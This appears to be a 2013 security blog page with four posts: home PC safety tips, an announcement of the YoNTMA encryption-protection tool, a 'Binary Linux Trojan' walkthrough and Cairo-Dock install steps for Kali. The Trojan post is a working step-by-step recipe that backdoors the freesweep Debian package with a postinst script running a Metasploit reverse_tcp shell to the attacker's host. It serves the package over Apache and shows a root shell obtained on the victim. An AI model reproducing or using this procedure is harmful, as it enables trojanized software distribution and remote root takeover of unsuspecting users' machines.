Wednesday, 19 June 2013

How to Protect Your Computer from Hackers , Spyware and Viruses




How to Protect Your Computer from Hackers :

When you’re online, you expose your vulnerability to malicious virus that have been growing in virulence and ferocity over the last few years. These program codes have gone beyond mere annoyances with the worst kinds disabling your PC, but they have become portals for remotely perpetuating more sinister activity that can clandestinely hack into sites, mount denial of services or steal confidential and personal data for fraudulent financial gain at your expense.

Are these virus serious enough to cause losses? Among home PC users, you may think having to reinstall your OS after a virus or malware has brought it down is not really expensive as you lose just a day or two to reinstall your programs and rebuilding files, consider that in a business, you could actually lose millions. Just ask ChoicePoint when it took a $6 million charge in 2005 after cyber criminals hacked into their systems and stole sensitive data from thousands of customers. Or the credit card processor CardSystems Solutions which may yet go out of business from major security breach at the company's Tucson, Arizona, operations center. In a recent consumer survey among security breach victims, people don't take lightly the loss of their data. More than 60% of respondents indicated their plans to terminate business relationships with a company that lost the data they entrusted to them.

In 2004, rootkits were a relatively obscure form of Trojans meant to infect Unix computers. But by 2005, rootkits have become a mainstream security threat after Sony BMG Music Entertainment shipped a few million CDs that contained a rootkit among its copy protection scheme. Within a few months, Sony recalled the CDs, but it was too late, According to security experts, rootkits attacking Windows PC were here to stay.

Most of the viruses on the computer were hidden in files that had been downloaded off the Internet: songs, videos, and movies. I was amazingly surprised that the computer lasted for 2 years with that many viruses! So I gave my dear cousin a serious lesson in how to protect her computer from the dangers of the Internet and I will go through them here for anyone else who might be interested!

1. Install Anti-Virus Software - This should not even have to be listed, if you don’t have anti-virus software installed, you’re asking for trouble! And if your reason for not installing anti-virus software is because it’s too expensive, then that can reason can be shot down because there are several free anti-virus programs out there that are considered better than commercial software packages. Here are two of the most popular ones:

AVG Anti-Virus – Very good and completely free.

Avast Anti-Virus – Almost on par with AVG.

Kaspersky Anti-Virus – Not free, but one of the best detection rates.

2. Update All Software - Installing an anti-virus program by itself is not enough. There are hundreds of new threats that are found daily and the anti-virus programs release updates regularly to combat the new threats. Make sure you anti-virus program is set to update automatically so that you don’t have to rely on your memory to do it. Also, this goes for all the software on your computer. The most important software to keep up to date is your Windows operating system. It is essential to have Automatic Updates turned on and set to download and install updates automatically.

3. Install only Trusted Software - If you’re not sure what a piece of software does from it’s name, then don’t install it. Also, don’t install anything you didn’t intend to install in the first place. Sometimes programs will ask you to install other programs during the install of the first application. Be careful of that because it’s usually spyware. Install software from big names sites only, such as Microsoft or Adobe.

4. Avoid P2P File Sharing Software – If used with great caution, P2P software is quite useful for movies, songs and software, but if you’re not very technically savvy, you might end up downloading a song that has a keystroke logger attached to it that will send anything you type to some other computer over the Internet. It’s almost impossible to tell that this is occurring unless your anti-virus or anti-spyware programs pick it up in their scans.

5. Delete Unknown Emails – If you receive emails from random people’s names, do not bother to open the email, just delete it. If you have any doubts after reading the name and the subject, it’s probably not someone you know. Never download or open attachments unless you are sure it’s from someone you know. Give the person a call quickly and ask them if you’re not sure. Most large companies that you create online accounts with will not send you attachments unless you specifically ask for them through their web site. Also, be wary of any emails from sites pretending to be banks, auction sites, etc asking for you to verify bank account info or address info. No bank ever does that.

6. Do not click on Ads - Avoid clicking on ads if you can. Especially those ads where something is flying around and if you shoot the duck, you win some prize! Ads have become more sophisticated in that they try to make the ad interactive so that you’ll be tempted to play it like a game.

7. Run Virus Scans Regularly – If you’re not in the mood to scan every day, at least run a scan once a week. Actually, setup a schedule for your computer in your anti-virus software to run a scan late at night or whenever you don’t use your computer and that way you won’t be bothered with a slow computer.

8. Be careful what you attach to your computer – This is a more common way to transfer viruses than you might think. Everyone now has a USB flash stick that they carry around on their key chains, ready to snap into any computer. But who knows what your viruses are on your friends computers and what accidentally got transferred to their USB stick. A lot of virus programs will auto launch right when the USB stick is put into the computer, so you don’t even have to open or download any of the files to be infected.

9. Avoid Shady Web Sites – If you need to look at porn, then make sure you do it in a virtual environment. You are DEFINITELY going to get some virus or spyware if you browse porn sites on your computer. Virtualization basically allows you to run programs like Internet Explorer in a virtual environment that does not effect your current operating system. If you want to find out more, search for “Virtual PC” or “VM Ware” in Google. Otherwise, simply avoid going to shady web sites!

10. Turn On or Install a Firewall - If you’re running Windows XP, make sure Windows Firewall is turned on. A firewall prevents hackers from gaining access to your computer by limiting the number of ports that are open to the public. Also, when buying a wireless router, make sure it has a built in firewall. Having a software and hardware firewall is better than just having one or the other.

11. Secure Your Wireless Network – Most wireless routers are set to no security when you install them. Be sure to log into the router and at least set the basic security that requires a password. There are stronger encryption options, but if you don’t understand those, then simply set a password on the router, otherwise anyone can connect to your home network and access everything.

12. Use a Complex Password for Login – This means that you should already have a password to login to your computer. Not having a password at all is not a good idea. Create a password for all user accounts and make sure it’s complex. Complex means it should have numbers, upper case characters, lower case characters, and symbols. This makes it way more difficult for a hacker to get into your computer.
Posted by at No comments:
Labels: , , ,

YoNTMA - A tool to protect your encrypted data




You're a responsible defender of your data. You keep all of your disks encrypted. You hibernate your laptop when you're not using it to keep any sensitive data out of RAM. You're known by friends, family, and colleagues as a tireless crusader against data theft. But do you hibernate your laptop when you visit a co-worker's office for a few minutes? What about when you get up to use the bathroom? What happens if a thief snatches your laptop while it's locked, but still powered on? The encryption keys are still in memory, which makes them vulnerable to DMA or cold boot attacks. Once the thief has the data encryption keys, they effectively have physical access to an unencrypted laptop, which means game over for your data.

Enter YoNTMA ! YoNTMA (You'll Never Take Me Alive!) is a tool designed to enhance the protection of encrypted data. YoNTMA runs as a background service and begins monitoring your computer any time the screen is locked. If the power cable or Ethernet cable is disconnected from the system while your laptop is locked, YoNTMA will immediately hibernate the machine to ensure that the disk encryption keys do not remain in RAM. This ensures that if a thief walks off with your powered-on laptop, your encrypted data stays protected.

iSEC Partners is pleased to announce the first public release of YoNTMA. The project is hosted on GitHub at the following URL 

Try it out and let us know what features you'd like to see or any other feedback you have on the Issues page.
Posted by at No comments:
Labels:

Thursday, 30 May 2013

Binary Linux Trojan

Linux_Trojan

Binary Linux Trojan

Binary Linux Trojan is  not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. An excellent video was made by Redmeat_uk demonstrating this technique that you can view at http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package 'freesweep', a text-based version of Mine Sweeper.

root@kali:~# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~# mkdir /tmp/evil
root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@kali:~# cd /tmp/evil/
root@kali:/tmp/evil#


Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added "features".

root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
root@kali:/tmp/evil# mkdir work/DEBIAN


In the 'DEBIAN' directory, create a file named 'control' that contains the following:
root@kali:/tmp/evil/work/DEBIAN# nano control

Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper

We also need to create a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following:
root@kali:/tmp/evil/work/DEBIAN# cat postinst

#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

Now we'll create our malicious payload. We'll be creating a reverse shell to connect back to us named 'freesweep_scores'.

root@kali:~# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.101,LPORT=443


We'll now make our post-installation script executable and build our new package. The built file will be named 'work.deb' so we will want to change that to 'freesweep.deb' and copy the package to our web root directory.

root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
root@kali:/tmp/evil# mv work.deb freesweep.deb
root@kali:/tmp/evil# cp freesweep.deb /var/www/

If it is not already running, we'll need to start the Apache web server.
root@kali:/tmp/evil# service apache2 start


We will need to set up the Metasploit multi/handler to receive the incoming connection.

root@kali:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.

ubuntu@ubuntu:~$ wget http://192.168.1.105/freesweep.deb

ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb


As the victim installs and plays our game, we have received a shell!

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)

ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...snip...

hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)



Posted by at No comments:
Labels: , , , ,

How to install Dock in Kali Linux

url

Install Dock in Kali Linux

Cairo-Dock is a pretty, fast and customizable desktop interface. You can see it as a good alternative/addition to Unity, Gnome-Shell, Xfce-panel, KDE-panel, etc
Here is a short summary of the improvements and new features in this version 3.1. Cairo-Dock sits in the centre of your desktop, allowing you to monitor and control your favourite apps: music players, chat messengers, twitter, torrents downloaders, RSS feeds, calendar/tasks, weather, mail checkers, etc, and a powerful taskbar.

Cairo Dock includes many plugins/applets such as: weather, clock, Messaging Menu, system monitor, keyboard indicators, custom icons, notification area, clipboard manager, and many other plugins.

What's New in Cairo Dock?
Main Changes:

  • Better integration of Unity: support of the Launcher API and better support of indicators

  • All configuration windows have been merged into a single one.

  • Added progress bars in several applets and in the Dbus API

  • The Music Player applet can control players in the systray.

  • Icons of the taskbar can be separated from launchers or not

  • The advanced mode of the configuration panel has been improved (thanks to SQP!)

  • Messaging Menu has been rewritten for newer versions and two new 'indicator' applets have been added:

  • Printers-Menu: it shows active print jobs.

  • and Sync-Menu: e.g. on Ubuntu 12.10, it collects status information data from processes that involve some form of synchronisation with servers; such as about apps like Ubuntu One.

  • various bug fixes and improvements


Core:

  • The dock now supports XRandr which should replace Xinerama and help the dock to manage multi-monitors.

  • Progress bars can now be customised (in the advanced mode of the configuration panel / 'Indicators' module).

  • We can drop .sh files into the dock to quickly create a new launcher.

  • The "Lock icons position" now only block the icons position but we can still add new launchers/files from the menu/file manager.

  • QuickList menu entries are now translated if it's available.

  • We can now launch the dock with '-W' (--metacity-workaround) option which is a workaround for window managers (e.g. Metacity) not handling the opacity correctly (if your subdock/dock/dialogues are invisible).

  • Window's actions have been merged into a single menu entry (right-click menu).

  • The default view now use all the screen space to avoid the jitter of the dock when it is resized (visible only if your window manager doesn't resize it correctly).

  • Labels in vertical dock now ends with a gradation.

  • The dock now supports animated images with variable rate (have a look to the new 'Busy' animation when the Weather applet is downloading data or when you're uploading files with the 'Drop to Share' applet).


Plug-ins:

  • Clock: We can now easily add a new task by doing a right click on the calendar.

  • Drop to Share: Supported text files (now it uploads the content of text files to servers like pastebin).

  • Applications Menu: used gio to launch the menu entries, so that the event is stored in Zeitgeist.

  • Mail: Improved the look of the icon and its dialogue.

  • MusicPlayer: Prevented displaying quicklists, since the applet already provides all the common actions for any player.

  • Notification Area: displayed the title, the label and the description (if they are available) on the label of the icon.

  • PowerManager: displayed the details of all batteries (and not only the first one) and modify the icon if the battery is removed/added.

  • QuickBrowser: Added drag support (e.g. to quickly drop file into GMail in order to join this file to the mail).

  • Recent-Events: prevented double entries in the menu list and unavailable files.

  • Recent Events: added recent applications.

  • Shortcuts: added the possibility to launch nautilus-connect-server from its menu

  • Shortcuts: Move 'Home' directory to the bookmark list

  • Stack: it now supports all URI extensions, not only files from the file system but also files from servers or even from the trash.

  • Switcher: Added new options and modify the lists of options. Now we can have a very simple drawing (like Swichter applet of the Gnome-Panel).

  • Added an option to have progress bars in a few applet (Sound Control, Wifi, PowerManager, etc.).


Other Changes:

  • A new 'third-party' applet is available: YoutubeDL to easily download Youtube videos (thanks to Brian).

  • Twitter applet now supports Identi.ca.

  • 3 new themes are available.

  • The code has been cleaned in order to remove most warnings when we compile it with -Wall (and -Wextra for the core).

  • Translations have been updated.


Installation with one copy-paste


If you don't want to learn more about the installation or if you want a quick install of the dock, copy-paste all this box in a terminal
(Note: The 2nd line is long and is maybe displayed as 2 lines on the page, but it's a single line.)

  • sudo -v


Please write your password (it's invisible )

  • echo "deb http://download.tuxfamily.org/glxdock/repository/ubuntu $(lsb_release -sc) cairo-dock" | sudo tee -a /etc/apt/sources.list



  • wget -q http://download.tuxfamily.org/glxdock/repository/cairo-dock.gpg -O- | sudo apt-key add -



  • sudo apt-get update



  • sudo apt-get install cairo-dock cairo-dock-plug-ins # or if the dock is already installed => # sudo apt-get dist-upgrade



Posted by at No comments:
Labels: ,
Subscribe to: Comments (Atom)